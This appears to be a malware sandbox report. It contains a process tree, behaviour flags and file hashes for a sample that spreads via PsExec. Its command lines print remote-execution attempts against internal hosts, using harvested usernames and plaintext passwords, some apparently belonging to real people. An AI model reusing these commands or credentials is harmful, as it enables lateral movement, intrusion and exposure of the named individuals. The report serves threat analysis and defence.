    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS
[1] C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\PSEXESVC.exe
  C:\Windows\PSEXESVC.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

  [2] C:\Windows\_ple.exe
    "_ple.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\system32\notepad.exe"
      - Drops file in Windows directory

  [2] C:\Windows\_ple.exe
    "_ple.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\system32\notepad.exe"
      - Drops file in Windows directory

  [2] C:\Windows\_ple.exe
    "_ple.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\system32\notepad.exe"
      - Drops file in Windows directory

  [2] C:\Windows\_ple.exe
    "_ple.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\system32\notepad.exe"
      - Drops file in Windows directory

  [2] C:\Windows\_ple.exe
    "_ple.exe"
    - Executes dropped EXE

    [3] C:\Windows\SysWOW64\notepad.exe
      "C:\Windows\system32\notepad.exe"
      - Drops file in Windows directory

[1] C:\Windows\system32\wbengine.exe
  "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\vdsldr.exe
  C:\Windows\System32\vdsldr.exe -Embedding

[1] C:\Windows\System32\vds.exe
  C:\Windows\System32\vds.exe
  - Checks SCSI registry key(s)
Network

MITRE ATT&CK Matrix ATT&CK v6

Downloads
C:\Windows\PSEXESVC.exe
  MD5    75b55bb34dac9d02740b9ad6b6820360
  SHA1   a17c21b909c56d93d978014e63fb06926eaea8e7
  SHA256 141b2190f51397dbd0dfde0e3904b264c91b6f81febc823ff0c33da980b69944
  SHA512 a5228ccb60d45102beb0be31aa7f6052b0ed9d1da8d69880265c1012e61fd298477a9528c703dafb09060af829a7c59154602fec2cb46ef250411cc703beb7de

C:\Windows\TEMP\_fif.exe (the same file, with identical hashes, is listed 24 more times as C:\Windows\Temp\_fif.exe, one entry per PsExec invocation; those repeats are collapsed here)
  MD5    27304b246c7d5b4e149124d5f93c5b01
  SHA1   e50d9e3bd91908e13a26b3e23edeaf577fb3a095
  SHA256 3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef
  SHA512 bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

C:\Windows\TEMP\_ple.exe
  MD5    ca0eaca077aa67f2609f612cefe7f1f3
  SHA1   5e42386540acbb0949b78d5c0e37e0a186ddc18a
  SHA256 3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2
  SHA512 ab1963c8c29f9c16d28a8662227b7404e419ce099e06e3a8f047ac106d8f8f836e8c10a663121ce939ab22b0d4239ae644b226317830d4407dc015a792ad67c9

C:\Windows\TEMP\_umx.exe (also listed once as C:\Windows\Temp\_umx.exe with identical hashes)
  MD5    3c0d740347b0362331c882c2dee96dbf
  SHA1   8350e06f52e5c660bb416b03edb6a5ddc50c3a59
  SHA256 ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85
  SHA512 a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f

C:\Windows\TEMP\vfrkl.exe (also listed once as C:\Windows\Temp\vfrkl.exe with identical hashes)
  MD5    86d1a184850859a6a4d1c35982f3c40e
  SHA1   4abde6ff4d7f30c60dc61e866c4a11a7eee5bef5
  SHA256 eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f
  SHA512 e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a

C:\Windows\_ple.exe (listed four times, each time with different hashes, and none of them matching C:\Windows\TEMP\_ple.exe above)
  MD5    5de09ff3f2fe37fca81313d0f8afce88
  SHA1   13b42d066c94c6bcf50be8f16d7d80b2f9fe47cc
  SHA256 ca9979c44fa86aef1813fdac20993c6c6c01ffb7fb72b7cafd9bdbe5d1543fd0
  SHA512 894708b67ea74083b705d2149fde35e48c832e9b6770db483ec0ee0cc0b2d387106aa5a4cb01f6bcfdb58907b71351a264e59588239864b1382ba6f2eb7d0595

C:\Windows\_ple.exe
  MD5    a61ec9adf13e73763912b08d6cb2a391
  SHA1   a1b5b195522b0ee627d854ba5bce18597f28d76c
  SHA256 4a7153ad7214bf789730d66fbb36a875adfe409b50c7ec52952617e15f6d9411
  SHA512 0532a0d396f7b805f2ee38422110922455cf4bbde3cab0e966b48cceafb0c0c6bc4b6671bb9f8683551a8840e845639d4640b27f04454669f296c67c6d5e8103

C:\Windows\_ple.exe
  MD5    459756239d06d6090ceb2aadb92faaec
  SHA1   590cb306a318158850b392d239acfc9fd349d0ca
  SHA256 35378e1886d50bba7959f4d4e21420ab471d21c136eb68408db0d9907b52bead
  SHA512 1f99225ce9f3054c0bad634a8b9cf5b36e53e8df48cb2c0f75d93ba73dd44c28bee0b5a3ddadddbb56a9c954fa04a9704991a7f9ccaad8c2b1e50415c88c313e

C:\Windows\_ple.exe
  MD5    9dd1566c7fb0bc9fc7448761083f7a39
  SHA1   968da6a61ffb256e64332b5e8778a9a6fd510cc2
  SHA256 9abe6f6c29988bd6ae60b40e528f1b632c4dd8e20aa617aaa5feae6e529ba0ae
  SHA512 e0e0cc3c2b0e881241f1a912b5f5cc0fb19d4e11059ae30bb41d519a65520e430cb8bb6584a21d8dfbc537a62b9b91fa562c7d3682b616eea77f9747c57da1b0
\??\PIPE\wkssvc (listed twice)
  MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\UNC\10.10.0.74\ADMIN$\PSEXESVC.exe (listed twice; same four hashes as \??\PIPE\wkssvc above)

\??\UNC\Ewycradz\ADMIN$\_ple.exe (same four hashes as \??\PIPE\wkssvc above)

\??\UNC\Ewycradz\pipe\PSEXESVC (same four hashes as \??\PIPE\wkssvc above)

Caveat on these last four entries: d41d8cd98f00b204e9800998ecf8427e, da39a3ee5e6b4b0d3255bfef95601890afd80709, e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 and cf83e1357eefb8bd... are the MD5, SHA1, SHA256 and SHA512 values of zero-length input. The sandbox recorded handles opened on the remote ADMIN$ shares and on the PSEXESVC control pipe but captured no bytes through them, so these rows are evidence of the PsExec copy-and-install attempt (target by address, 10.10.0.74, and by name, Ewycradz), not of a successful remote write. Use the paths as indicators; do not add the hashes to a blocklist, they match every empty file.